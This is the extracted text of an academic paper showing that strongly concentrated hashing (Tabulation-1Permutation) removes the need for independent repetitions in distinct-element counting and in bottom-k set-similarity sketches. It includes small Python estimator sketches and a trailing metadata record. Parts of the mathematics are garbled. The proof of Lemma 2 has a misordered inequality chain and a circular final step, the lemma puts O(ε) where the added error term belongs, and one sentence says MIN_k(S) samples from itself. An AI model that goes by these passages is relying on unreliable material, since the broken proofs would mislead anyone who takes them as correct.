**Definition 1.** A hash function $h : U \rightarrow [0, 1]$ is strongly concentrated with added error probability $\mathcal{E}$ if for any set $S \subseteq U$ and $p \in [0, 1]$, if $X$ is the number of elements from $S$ hashing below $p$, $\mu = p|S|$ and $\varepsilon \leq 1$, then

$$\Pr[|X - \mu| \geq \varepsilon \mu] \leq 2 \exp(-\Omega(\varepsilon^2 \mu)) + \mathcal{E}.$$

If $\mathcal{E} = 0$, we simply say that $h$ is strongly concentrated.

Another way of viewing the added error probability $\mathcal{E}$ is as follows.
We have strong concentration as long as we do not aim for error probabilities below $\mathcal{E}$, so if $\mathcal{E}$ is sufficiently low, we can simply ignore it. What makes this definition interesting in practice is that Aamand et al. [1] recently presented a fast and practical constant-time hash function that for $U = [u] = \{0, \ldots, u - 1\}$ is strongly concentrated with added error probability $u^{-\gamma}$ for any constant $\gamma$. This term is so small that we can ignore it in all our applications. The speed is obtained using certain character tables in cache that we will discuss later.

Next we consider our two streaming applications, distinct elements and set similarity, showing how strongly concentrated hashing eliminates the need for time consuming independent repetitions. We stress that in streaming algorithms on high volume data streams, speed is of critical importance. If the data is not processed quickly, the information is lost. Distinct elements is the simplest case, and here we will also discuss the ramifications of employing the strongly concentrated hashing of Aamand et al. [1] as well as possible alternatives.

### 2 Counting distinct elements in a data stream

We consider a stream of keys $x_1, x_2, \ldots \in [u]$ where each key may appear multiple times. Using only little space, we wish to estimate the number $n$ of distinct keys. We are given parameters $\varepsilon$ and $\delta$, and the goal is to create an estimator, $\hat{n}$, such that $(1 - \varepsilon)n \leq \hat{n} \leq (1 + \varepsilon)n$ with probability at least $1 - \delta$.

Following the classic approach of Bar-Yossef et al. [3], we use a strongly universal hash function $h : U \rightarrow (0, 1]$. For simplicity, we assume $h$ to be collision free over $U$. For some $k > 1$, we maintain the $k$ smallest distinct hash values of the stream. We assume for simplicity that $k \leq n$. The space required is thus $O(k)$, so we want $k$ to be small.
Let $x_{(k)}$ be the key having the $k$th smallest hash value under $h$ and let $h_{(k)} = h(x_{(k)})$. As in [3], we use $\hat{n} = k/h_{(k)}$ as an estimator for $n$ (we note that [2] suggests several other estimators, but the points we will make below apply to all of them). The point in using a hash function $h$ is that all occurrences of a given key $x$ in the stream get the same hash value, so if $S$ is the set of distinct keys, $h_{(k)}$ is just the $k$th smallest hash value from $S$. In particular, $\hat{n}$ depends only on $S$, and not on the frequencies of the elements of the stream. Assuming no collisions, we will often identify the elements with the hash values, so $x_i$ is smaller than $x_j$ if $h(x_i) \leq h(x_j)$. We would like $1/h_{(k)}$ to be concentrated around $n/k$. For any probability $p \in [0, 1]$, let $X^{<p}$ denote the number of elements from $S$ that hash below $p$. Let $p_- = k/((1 + \varepsilon)n)$ and $p_+ = k/((1 - \varepsilon)n)$. Note that both $p_-$ and $p_+$ are independent of the random hash function $h$. Now $$1/h_{(k)} \leq (1 - \varepsilon)n/k \iff X^{<p_+} < k = (1 - \varepsilon)E[X^{<p_+}]$$ $$1/h_{(k)} > (1 + \varepsilon)n/k \iff X^{<p_-} \geq k = (1 + \varepsilon)E[X^{<p_-}],$$ and these observations form a good starting point for applying probabilistic tail bounds as we now describe. 
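A minimal sketch of this estimator, keeping the $k$ smallest distinct hash values in a max-heap; the hash function is passed in as a parameter, and the heap-plus-set bookkeeping is our own simplification for clarity, not the paper's implementation:

```python
import heapq

# Minimal sketch of the estimator n_hat = k / h_(k): stream through the keys,
# keep the k smallest *distinct* hash values in a max-heap (negated values),
# and return k divided by the k-th smallest hash value. The hash function h
# should behave like a uniform, collision-free map into (0, 1].
def estimate_distinct(stream, k, h):
    heap = []            # max-heap via negation: -heap[0] is the largest kept
    members = set()      # hash values currently kept, to skip duplicates
    for x in stream:
        v = h(x)
        if v in members:
            continue     # repeated key: same hash value, ignore
        if len(heap) < k:
            heapq.heappush(heap, -v)
            members.add(v)
        elif v < -heap[0]:
            dropped = -heapq.heappushpop(heap, -v)
            members.discard(dropped)
            members.add(v)
    h_k = -heap[0]       # k-th smallest hash value (assumes k <= n)
    return k / h_k
```

With a strongly universal (or strongly concentrated) hash plugged in for `h`, this is the sketch analyzed in the following subsections.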
### 2.1 Strong universality and independent repetitions

Since $h$ is strongly universal, the hash values of any two keys are independent, so for any $p$, we have $\operatorname{Var}[X^{<p}] \leq \mathbb{E}[X^{<p}]$, and so by Chebyshev’s inequality,

$$\Pr\left[1/h_{(k)} \leq (1 - \varepsilon)n/k\right] \leq \frac{1 - \varepsilon}{k\varepsilon^2},$$

$$\Pr\left[1/h_{(k)} \geq (1 + \varepsilon)n/k\right] \leq \frac{1 + \varepsilon}{k\varepsilon^2}.$$

Assuming $\varepsilon \leq 1$, we thus get that

$$\Pr\left[|\hat{n} - n| > \varepsilon n\right] = \Pr\left[|1/h_{(k)} - n/k| > \varepsilon n/k\right] \leq 2/(k\varepsilon^2).$$

To get the desired error probability $\delta$, we could now set $k = 2/(\delta\varepsilon^2)$, but if $\delta$ is small, e.g. $\delta = 1/u$, $k$ becomes too large. As in [3] we instead start by aiming for a constant error probability $\delta_0$, say $\delta_0 = 1/4$. For this value of $\delta_0$, it suffices to set $k_0 = 8/\varepsilon^2$.

We now run $r$ (to be determined) independent experiments with this value of $k_0$, obtaining independent estimators $\hat{n}_1, \ldots, \hat{n}_r$ for $n$. Finally, as our final estimator, $\hat{n}$, we return the median of $\hat{n}_1, \ldots, \hat{n}_r$.

Now for each $1 \leq i \leq r$, $\Pr[|\hat{n}_i - n| > \varepsilon n] \leq 1/4$, and these events are independent. If $|\hat{n} - n| > \varepsilon n$, then $|\hat{n}_i - n| > \varepsilon n$ for at least half of the $1 \leq i \leq r$. By the standard Chernoff bound (1), this probability can be bounded by

$$\Pr\left[|\hat{n} - n| > \varepsilon n\right] \leq \exp(-(r/4)/3) = \exp(-r/12).$$

Setting $r = 12 \ln(1/\delta)$, we get the desired error probability $\delta$.
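The median-of-repetitions step just described is generic and tiny; a sketch, where `make_estimate` stands for any randomized estimator that is within the desired error with probability at least 3/4:

```python
import statistics

# The median trick: the median of r independent runs of a constant-error
# estimator is within the desired error except with probability exp(-Omega(r)).
def median_estimate(make_estimate, r):
    return statistics.median(make_estimate() for _ in range(r))
```

The point of this paper is precisely that, with strongly concentrated hashing, this wrapper (and its factor-$r$ cost in hashing time) becomes unnecessary.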
The total number of hash values stored is $k_0 r = (8/\varepsilon^2)(12 \ln(1/\delta)) = 96 \ln(1/\delta)/\varepsilon^2$.

### 2.2 A better world with fully random hashing

Suppose instead that $h : [u] \to (0, 1]$ is a fully random hash function. In this case, the standard Chernoff bounds (1) and (2) with $\varepsilon \leq 1$ yield

$$\Pr\left[1/h_{(k)} \leq (1 - \varepsilon)n/k\right] \leq \exp(-(k/(1 - \varepsilon))\varepsilon^2/2),$$

$$\Pr\left[1/h_{(k)} \geq (1 + \varepsilon)n/k\right] \leq \exp(-(k/(1 + \varepsilon))\varepsilon^2/3).$$

Hence

$$\Pr\left[|\hat{n} - n| > \varepsilon n\right] = \Pr\left[|1/h_{(k)} - n/k| > \varepsilon n/k\right] \leq 2\exp(-k\varepsilon^2/6). \quad (3)$$

Thus, to get error probability $\delta$, we just use $k = 6 \ln(2/\delta)/\varepsilon^2$. There are several reasons why this is much better than the above approach using 2-independence and independent repetitions.

- It avoids the independent repetitions, so instead of applying $r = \Theta(\log(1/\delta))$ hash functions to each key we just need one. We thus save a factor of $\Theta(\log(1/\delta))$ in speed.
- Overall we store fewer hash values: $k = 6 \ln(2/\delta)/\varepsilon^2$ instead of $96 \ln(1/\delta)/\varepsilon^2$.
- With independent repetitions, we are tuning the algorithm depending on $\varepsilon$ and $\delta$, whereas with a fully random hash function, we get the concentration from (3) for every $\varepsilon \leq 1$.

The only caveat is that fully random hash functions cannot be implemented.

### 2.3 Using hashing with strong concentration bounds

We now discuss the effect of relaxing the abstract fully random hashing to hashing with strong concentration bounds and added error probability $\mathcal{E}$.
Then for $\varepsilon \leq 1$,

$$\Pr\left[1/h_{(k)} \leq (1 - \varepsilon)n/k\right] \leq \exp(-\Omega((k/(1 - \varepsilon))\varepsilon^2)) + \mathcal{E},$$

$$\Pr\left[1/h_{(k)} \geq (1 + \varepsilon)n/k\right] \leq \exp(-\Omega((k/(1 + \varepsilon))\varepsilon^2)) + \mathcal{E},$$

so

$$\Pr\left[|\hat{n} - n| > \varepsilon n\right] = \Pr\left[|1/h_{(k)} - n/k| > \varepsilon n/k\right] \leq 2\exp(-\Omega(k\varepsilon^2)) + O(\mathcal{E}). \quad (4)$$

To obtain the error probability $\delta = \omega(\mathcal{E})$, we again need to store $k = O(\log(1/\delta)/\varepsilon^2)$ hash values. Within a constant factor, this is the same total number of hash values as with 2-independence and independent repetitions, and we still retain the following advantages from the fully random case.

- With no independent repetitions we avoid applying $r = \Theta(\log(1/\delta))$ hash functions to each key, so we basically save a factor $\Theta(\log(1/\delta))$ in speed.
- With independent repetitions, we only address a given $\varepsilon \leq 1$ and $\delta$, while with a strongly concentrated hash function we get the concentration from (4) for every $\varepsilon \leq 1$.

### 2.4 Implementation and alternatives

We briefly discuss how to maintain the $k$ smallest elements/hash values. The most obvious method is using a priority queue, but this takes $O(\log k)$ time per element, dominating the cost of evaluating the hash function. However, we can get down to constant time per element if we have a buffer for $\Theta(k)$ hash values. When the buffer gets full, we find the median in linear time with (randomized) selection and discard the bigger elements. This is standard to de-amortize if needed.

A different, and more efficient, sketch from [3] identifies the smallest $b$ such that the number $X^{<1/2^b}$ of keys hashing below $1/2^b$ is at most $k$. For the online processing of the stream, this means that we increment $b$ whenever $X^{<1/2^b} > k$. At the end, we return $2^b X^{<1/2^b}$.
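This alternative sketch can be outlined as follows; here the stream of hash values is given directly as input, and the set-based bookkeeping is a simplification for clarity:

```python
# Outline of the alternative sketch: keep the hash values below 1/2^b and
# increment b whenever more than k of them survive.
def distinct_sketch(hash_values, k):
    b = 0
    kept = set()                        # hash values below the threshold 1/2^b
    for v in hash_values:
        if v < 1 / 2**b:
            kept.add(v)
            while len(kept) > k:        # X^{<1/2^b} > k: raise b
                b += 1
                kept = {u for u in kept if u < 1 / 2**b}
    return 2**b * len(kept)             # the estimate 2^b * X^{<1/2^b}
```

Only the hash values below the current threshold are stored, so at most about $2k$ values are ever kept.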
The analysis of this alternative sketch is similar to the one above, and we get the same advantage of avoiding repetitions using strongly concentrated hashing. That is, for error probability $\delta$, in [3] they run $O(\log(1/\delta))$ independent experiments with independent hash functions, each storing up to $k = O(1/\varepsilon^2)$ hash values, whereas we run only a single experiment with a single strongly concentrated hash function storing $k = O(\log(1/\delta)/\varepsilon^2)$ hash values. The total number of hash values stored is the same, but asymptotically, we save a factor $\log(1/\delta)$ in time.

**Other alternatives** Estimating the number of distinct elements in a stream began with the work of Flajolet and Martin [13] and has continued with a long line of research [2, 3, 4, 5, 8, 9, 11, 12, 13, 14, 15, 16, 17, 27]. In particular, there has been a lot of focus on minimizing the sketch size. Theoretically speaking, the problem finally found an asymptotically optimal solution, both in time and in space, by Kane, Nelson and Woodruff [18], assuming we only need $\frac{2}{3}$ probability of success. The optimal space, including that of the hash function, is $O(\varepsilon^{-2} + \log n)$ bits, improving the $O(\varepsilon^{-2} \cdot \log n)$ bits needed by Bar-Yossef et al. [3] to store $O(\varepsilon^{-2})$ hash values.

Both [3] and [18] suggest using $O(\log(1/\delta))$ independent repetitions to reduce the error probability to $\delta$, but then both time and space blow up by a factor $O(\log(1/\delta))$. Recently Blasiok [6] found a space optimal algorithm for the case of small error probability $\delta$. In this case, the bound from [18] with independent repetitions was $O(\log(1/\delta)(\varepsilon^{-2} + \log n))$, which he reduces to $O(\log(1/\delta)\varepsilon^{-2} + \log n)$, again including the space for hash functions.
He no longer has $O(\log(1/\delta))$ hash functions, but this only helps his space, not his processing time, which he states as polynomial in $\log(1/\delta)$ and $\log n$.

The above space optimal algorithms [6, 18] are very interesting, but fairly complicated, seemingly involving some quite large constants. However, here our focus is to get a fast practical algorithm to handle a high volume data stream online, not worrying as much about space. Assuming fast strongly concentrated hashing, it is then much better to use our implementation of the simple algorithm of Bar-Yossef et al. [3] using $k = O(\varepsilon^{-2} \log(1/\delta))$.

### 2.5 Implementing Hashing with Strong Concentration

As mentioned earlier, Aamand et al. [1] recently presented a fast and practical constant-time hash function, Tabulation-1Permutation, that for $U = [u] = \{0, \ldots, u-1\}$ is strongly concentrated with added error probability $u^{-\gamma}$ for any constant $\gamma$. The scheme obtains its power and speed using certain character tables in cache.

More specifically, we view keys as consisting of a small number $c$ of characters from some alphabet $\Sigma$, that is, $U = \Sigma^c$. For 64-bit keys, this could be $c = 8$ characters of 8 bits each. Let’s say that hash values are also from $U$, but viewed as bit strings representing fractions in $[0,1)$. Tabulation-1Permutation needs $c + 1$ character tables mapping characters to hash values. To compute the hash value of a key, we need to look up $c + 1$ characters in these tables. In addition we need $O(c)$ fast $\mathrm{AC}^0$ operations to extract the characters and xor the hash values. The character tables can be populated with an $O(\log n)$-independent pseudo-random number generator, needing a random seed of $O((\log n)(\log u))$ bits.
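The table-lookup structure can be illustrated with plain simple tabulation over $c = 8$ eight-bit characters; note that this sketch omits the extra permutation table that distinguishes Tabulation-1Permutation, so it is not the full scheme from [1]:

```python
import random

# Plain simple tabulation over c = 8 eight-bit characters of a 64-bit key:
# one random table per character position; the hash is the xor of one lookup
# per character. Tabulation-1Permutation adds one more table that permutes a
# character of the output; that step is omitted in this sketch.
C, BITS = 8, 8
random.seed(1)  # any seed; the tables just need to be filled with random words
TABLES = [[random.getrandbits(64) for _ in range(1 << BITS)] for _ in range(C)]

def simple_tabulation(key):
    h = 0
    for i in range(C):
        char = (key >> (BITS * i)) & 0xFF   # extract the i-th 8-bit character
        h ^= TABLES[i][char]                # one cache-resident table lookup
    return h                                # h / 2**64 gives a value in [0,1)
```

Each evaluation is a handful of shifts, masks, lookups and xors, which is what makes this family of schemes so fast in practice.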
**Computer dependent versus problem dependent view of resources for hashing** We view the resources used for Tabulation-1Permutation as computer dependent rather than problem dependent. When you buy a new computer you can decide how much cache you want to allocate for your hash functions. In the experiments performed in [1], using 8-bit characters and $c = 8$ for 64-bit keys was very efficient. On two computers, it was found that tabulation-1permutation was less than 3 times slower than the fastest known strongly universal hashing scheme; namely Dietzfelbinger’s [10] which does just one multiplication and one shift. Also, Tabulation-1Permutation was more than 50 times faster than the fastest known highly independent hashing scheme; namely Thorup’s [24] double tabulation scheme which, in theory also works in constant time. In total, the space used by all the character tables is $9 \times 2^8 \times 64$ bits which is less than 20 KB, which indeed fits in very fast cache. We note that when we have first populated the tables with hash values, they are not overwritten. This means that the cache does not get dirty, that is different computer cores can access the tables and not worry about consistency. This is different than the work space used to maintain the sketch of the number of distinct keys represented via $k = O(\varepsilon^{-2} \log(1/\delta))$ hash values, but let’s compare anyway with real numbers. Even with a fully random hash function with perfect Chernoff bounds, we needed $k = 6 \ln(2/\delta)/\varepsilon^2$, so with, say, $\delta = 1/2^{30}$ and $\varepsilon = 1\%$, we get $k > 2^{20}$, which is much more than the $9 \times 2^8$ hash values stored in the character tables for the hash functions. Of course, we would be happy with a much smaller $k$ so that everything is small and fits in fast cache. We note that any $k > |\Sigma| = 2^8$ rules out the concentration of previous tabulation schemes such a simple tabulation [21] and twisted tabulation [22]. 
The reader is referred to [1] for a thorough discussion of the alternatives. Finally, we relate our strong concentration from Definition [1] to the exact concentration result from [1]: **Theorem 1.** Let $h: [u] \rightarrow [r]$ be a tabulation-1Permutation hash function with $[u] = \Sigma^c$ and $[r] = \Sigma^d$, $c,d = O(1)$. Consider a key/ball set $S \subseteq [u]$ of size $n = |S|$ where each ball $x \in S$ is assigned a weight $w_x \in [0,1]$. Choose arbitrary hash values $y_1, y_2 \in [r]$ with $y_1 \leq y_2$. Define $X = \sum_{x \in S} w_x \cdot [y_1 \leq h(x) < y_2]$ to be the total weight of balls hashing to the interval $[y_1, y_2)$. Write $\mu = \mathbb{E}[X]$ and $\sigma^2 = \text{Var}[X]$. Then for any constant $\gamma$ and every $t > 0$, $$ \Pr[|X - \mu| \geq t] \leq 2 \exp(-\Omega(\sigma^2 C(t/\sigma^2))) + 1/u^\gamma. $$ Here $C: (-1, \infty) \rightarrow [0, \infty)$ is given by $C(x) = (x + 1) \ln(x + 1) - x$, so $\exp(-C(x)) = \frac{x^2}{(1+x)^{x+1}}$. The above also holds if we condition the random hash function $h$ on a distinguished query key $q$ having a specific hash value. The above statement is far more general than what we need. All our weights are unit weights. We fix $r = u$ and $y_1 = 0$. Viewing hash values as fractions in $[0,1)$, the random variable $X$ is the number of items hashing below $p = y_2/u$. Also, since $\text{Var}[X] \leq \mathbb{E}[X]$, (5) implies the same statement with $\mu$ instead of $\sigma^2$. Moreover, our $\varepsilon \leq 1$ corresponds to $t = \varepsilon \mu \leq \mu$, and then we get $$ \Pr[|X - \mu| \geq \varepsilon \mu] \leq 2 \exp(-\Omega(\mu C(\varepsilon))) + 1/u^\gamma \leq 2 \exp(-\Omega(\mu \varepsilon^2)) + 1/u^\gamma. $$ which is exactly as in our Definition [1]. Only remaining difference is that Definition [1] should work for any $p \in [0,1)$ while the bound we get only works for $p$ that are multiples of $1/u$. However, this suffices by the following general lemma: Lemma 2. 
Suppose we have a hash function \( h : [u] \rightarrow [0, 1] \) such that for any set \( S \subseteq U \) and for any \( p \in [0, 1] \) that is a multiple of \( 1/u \), for the number \( X^{<p} \) of elements from \( S \) that hash below \( p \), with \( \mu_p = p|S| \) and \( \varepsilon \leq 1 \), it holds that \[ \Pr \left[ |X^{<p} - \mu_p| \geq \varepsilon \mu_p \right] \leq 2 \exp(-\Omega(\varepsilon^2 \mu_p)) + O(\varepsilon). \] Then the same statement holds for all \( p \in [0, 1) \). **Proof.** First we note that the statement is trivially true if \( \varepsilon^2 \mu_p = O(1) \), so we can assume \( \varepsilon^2 \mu_p = \omega(1) \). Since \( \varepsilon \leq 1 \), we also have \( \mu_p = \omega(1) \). We are given an arbitrary \( p \in [0, 1) \). Let \( p_+ = i/u \) be the nearest higher multiple of \( 1/u \). Since \( |S| \leq u \) and \( \mu_p = p|S| \) we have \( i \geq \mu_p \), implying \( i = \omega(1) \). We also let \( p_- = (i-1)/u \). It is now clear that since \( p_- < p \leq p_+ \), it holds that \( X^{<p} \leq X^{<p_-} \leq X^{<p} \leq X^{<p+} \). We first show that \[ X^{<p} \leq (1 - \varepsilon)\mu_p \implies X^{<p-} \leq (1 - \varepsilon/2)\mu_{p-}. \] Indeed, \( X^{<p} \leq (1 - \varepsilon)\mu_p \) implies \( X^{<p-} \leq (1 - \varepsilon)p|S| \leq (1 - \varepsilon)(p_- + 1/u)|S| = \mu_{p-} - \varepsilon\mu_{p-} + (1 - \varepsilon)|S|/u \). But \( |S| \leq u \) and \( (1 - \varepsilon) < 1 \), so \( X^{<p-} \leq \mu_{p-} - \varepsilon\mu_{p-} + 1 \leq (1 - \varepsilon/2)\mu_{p-} \). The last follows from the fact that \( (\varepsilon/2)\mu_{p-} \geq (\varepsilon/2)\mu_p - (\varepsilon/2)|S|/u \geq (\varepsilon^2/2)\mu_p - 1 \), but \( \varepsilon^2 \mu_p = \omega(1) \) and so \( (\varepsilon/2)\mu_{p-} = \omega(1) \). The exact same reasoning gives \[ X^{<p} \geq (1 + \varepsilon)\mu_p \implies X^{<p+} \geq (1 + \varepsilon/2)\mu_{p+}. 
\] But then \[ \Pr \left[ |X^{<p} - \mu_p| \geq \varepsilon \mu_p \right] = \Pr \left[ X^{<p} \leq (1 - \varepsilon)\mu_p \right] + \Pr \left[ X^{<p} \geq (1 + \varepsilon)\mu_p \right] \leq \] \[ \Pr \left[ X^{<p-} \leq (1 - \varepsilon/2)\mu_{p-} \right] + \Pr \left[ X^{<p+} \geq (1 + \varepsilon/2)\mu_{p+} \right] \leq \] \[ \Pr \left[ |X^{<p} - \mu_p| \geq \varepsilon \mu_p \right] = \Pr \left[ |X^{<p} - \mu_p| \geq \varepsilon \mu_p \right] \leq \exp(-\Omega((\varepsilon/2)^2(\mu_p - 1))) + O(\varepsilon) = 2 \exp(-\Omega(\varepsilon^2 \mu_p)) + O(\varepsilon) \] We note that [1] also presents a slightly slower scheme, Tabulation-Permutation, which offers far more general concentration bounds than those for Tabulation-1Permutation in Theorem 1. However, Tabulation-1Permutation is faster and sufficient for the strong concentration needed for our streaming applications. ### 3 Set similarity We now consider Broder’s [2] original algorithm for set similarity. As above, it uses a hash function \( h : [u] \rightarrow [0, 1] \) which we assume to be collision free. The bottom-\( k \) sample \( \text{MIN}_k(S) \) of a set \( S \subseteq [u] \) consists of the \( k \) elements with the smallest hash values. If \( h \) is fully random then \( \text{MIN}_k(S) \) is a uniformly random subset of \( k \) distinct elements from \( \text{MIN}_k(S) \). We assume here that \( k \leq n = |S| \). With \( \text{MIN}_k(S) \), we can estimate the frequency \( f = |T|/|S| \) of any subset \( T \subseteq S \) as \( |\text{MIN}_k(S) \cap T|/k \). Broder’s main application is the estimation of the Jaccard similarity \( f = |A \cap B|/|A \cup B| \) between sets \( A \) and \( B \). 
Given the bottom-\( k \) samples from \( A \) and \( B \), we may construct the bottom-\( k \) sample of their union as \( \text{MIN}_k(A \cup B) = \text{MIN}_k(\text{MIN}_k(A) \cup \text{MIN}_k(B)) \), and then the similarity is estimated as \( |\text{MIN}_k(A \cup B) \cap \text{MIN}_k(A) \cap \text{MIN}_k(B)|/k \). We note again the crucial importance of having a common hash function \( h \). In a distributed setting, samples \( \text{MIN}_k(A) \) and \( \text{MIN}_k(B) \) can be generated by different entities. As long as they agree on \( h \), they only need to communicate the samples to estimate the Jaccard similarity of $A$ and $B$. As noted before, for Tabulation-1Permutation $h$ can be shared by exchanging a random seed of $O((\log n)(\log u))$ bits. For the hash function $h$, Broder \cite{7} first considers fully random hashing. Then $\text{MIN}_k(S)$ is a fully random sample of $k$ distinct elements from $S$, which is very well understood. Broder also sketches some alternatives with realistic hash functions, but Thorup \cite{23} showed that even if we just use 2-independence, we get the same expected error as with fully random hashing, but here we want strong concentration. Our analysis follows the simple union-bound approach from \cite{23}. For the analysis, it is simpler to study the case where we are sampling from a set $S$ and want to estimate the frequency $f = |T|/|S|$ of a subset $T \subseteq S$. Let $h(k)$ be the $k$th smallest hash value from $S$ as in the above algorithm for estimating distinct elements. For any $p$ let $Y^\leq_p$ be the number of elements from $T$ with hash value at most $p$. Then $|T \cap \text{MIN}_k(S)| = Y^{\leq h(k)}$ which is our estimator for $f_k$. **Theorem 3.** For $\varepsilon \leq 1$, if $h$ is strongly concentrated with added error probability $\mathcal{E}$, then $$\Pr\left[|Y^{\leq h(k)} - f_k| > \varepsilon f_k\right] = 2 \exp(-\Omega(fk\varepsilon^2)) + O(\mathcal{E}). \tag{6}$$ **Proof.** Let $n = |S|$. 
We already saw in \cite{4} that for any $\varepsilon_S \leq 1$, $P_S = \Pr\left[|1/h(k) - n/k| \geq \varepsilon_S n/k\right] \leq 2 \exp(-\Omega(k\varepsilon_S^2)) + O(\mathcal{E})$. Thus, with $p_- = k/(1 + \varepsilon_S)n$ and $p_+ = k/(1 - \varepsilon_S)n$, we have $h(k) \in [p_-, p_+]$ with probability $1 - P_S$, and in that case, $Y^{\leq p_-} \leq Y^{\leq h(k)} \leq Y^{\leq p_+}$. Let $\mu^- = \mathbb{E}[Y^{\leq p_-}] = fk/(1 + \varepsilon_S) \geq fk/2$. By strong concentration, for any $\varepsilon_T \leq 1$, we get that $$P_T^- = \Pr\left[Y^{\leq p_-} \leq (1 - \varepsilon_T)\mu_\cdot\right] \leq 2 \exp(-\Omega(\mu_\cdot\varepsilon_T^2)) + \mathcal{E} = 2 \exp(-\Omega(fk\varepsilon_T^2)) + \mathcal{E}.$$ Thus $$\Pr\left[Y^{\leq h(k)} \leq \frac{1 - \varepsilon_T}{1 + \varepsilon_S} fk\right] \leq P_T^- + P_S.$$ Likewise, with $\mu^+ = \mathbb{E}[Y^{\leq p_+}] = fk/(1 - \varepsilon_S)$, for any $\varepsilon_T$, we get that $$P_T^+ = \Pr\left[Y^{\leq p_+} \geq (1 + \varepsilon_T)\mu_\cdot\right] \leq 2 \exp(-\Omega(\mu_\cdot\varepsilon_T^2)) + \mathcal{E} = 2 \exp(-\Omega(fk\varepsilon_T^2)) + \mathcal{E},$$ and $$\Pr\left[Y^{\leq h(k)} \geq \frac{1 + \varepsilon_T}{1 - \varepsilon_S} fk\right] \leq P_T^+ + P_S.$$ To prove the theorem for $\varepsilon \leq 1$, we set $\varepsilon_S = \varepsilon_T = \varepsilon/3$. Then $\frac{1 + \varepsilon_T}{1 - \varepsilon_S} \leq 1 + \varepsilon$ and $\frac{1 - \varepsilon_T}{1 + \varepsilon_S} \geq 1 - \varepsilon$. Therefore $$\Pr\left[|Y^{\leq h(k)} - f_k| \geq \varepsilon f_k\right] \leq P_T^- + P_T^+ + 2P_S \leq 8 \exp(-\Omega(fk\varepsilon_T^2)) + O(\mathcal{E}) = 2 \exp(-\Omega(fk\varepsilon_T^2)) + O(\mathcal{E}).$$ This completes the proof of \textit{(6)}. \hfill \square As for the problem of counting distinct elements in a stream, in the online setting we may again modify the algorithm above to obtain a more efficient sketch. 
Assuming that the elements from $S$ appear in a stream, we again identify the smallest $b$ such that the number of keys from $S$ hashing below $1/2^b$, $X^{\leq 1/2^b}$, is at most $k$. We increment $b$ by one whenever $X^{\leq 1/2^b} > k$ and in the end we return $Y^{\leq 1/2^b}/X^{\leq 1/2^b}$ as an estimator for $f$. The analysis of this modified algorithm is similar to the analysis provided above. Acknowledgements Research of all authors partly supported by Thorup’s Investigator Grant 16582, Basic Algorithms Research Copenhagen (BARC), from the VILLUM Foundation. Evangelos Kipouridis has also received funding from the European Union’s Horizon 2020 research and innovation program under the Marie Skłodowska-Curie grant agreement No 801199. References
{"Source-Url": "https://static-curis.ku.dk/portal/files/257869915/2004.01156.pdf", "len_cl100k_base": 10064, "olmocr-version": "0.1.50", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 44787, "total-output-tokens": 12965, "length": "2e13", "weborganizer": {"__label__adult": 0.0004427433013916016, "__label__art_design": 0.0005855560302734375, "__label__crime_law": 0.0006265640258789062, "__label__education_jobs": 0.000934600830078125, "__label__entertainment": 0.00020742416381835935, "__label__fashion_beauty": 0.00024127960205078125, "__label__finance_business": 0.0005106925964355469, "__label__food_dining": 0.0005216598510742188, "__label__games": 0.0009303092956542968, "__label__hardware": 0.00206756591796875, "__label__health": 0.00151824951171875, "__label__history": 0.0005483627319335938, "__label__home_hobbies": 0.0001722574234008789, "__label__industrial": 0.0007481575012207031, "__label__literature": 0.0004930496215820312, "__label__politics": 0.00045943260192871094, "__label__religion": 0.0007491111755371094, "__label__science_tech": 0.467529296875, "__label__social_life": 0.00013947486877441406, "__label__software": 0.01165771484375, "__label__software_dev": 0.5078125, "__label__sports_fitness": 0.0003826618194580078, "__label__transportation": 0.0006256103515625, "__label__travel": 0.00027179718017578125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 38558, 0.03276]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 38558, 0.46976]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 38558, 0.80435]], "google_gemma-3-12b-it_contains_pii": [[0, 523, false], [523, 2284, null], [2284, 6914, null], [6914, 11254, null], [11254, 15265, null], [15265, 19992, null], [19992, 24721, null], [24721, 28897, null], [28897, 32667, null], [32667, 35696, null], [35696, 38558, null]], 
"google_gemma-3-12b-it_is_public_document": [[0, 523, true], [523, 2284, null], [2284, 6914, null], [6914, 11254, null], [11254, 15265, null], [15265, 19992, null], [19992, 24721, null], [24721, 28897, null], [28897, 32667, null], [32667, 35696, null], [35696, 38558, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 38558, null]], "pdf_page_numbers": [[0, 523, 1], [523, 2284, 2], [2284, 6914, 3], [6914, 11254, 4], [11254, 15265, 5], [15265, 19992, 6], [19992, 24721, 7], [24721, 28897, 8], [28897, 32667, 9], [32667, 35696, 10], [35696, 38558, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 38558, 0.0]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
d75db49b18504d5f5f28917bed3bd6bdc6541a2d
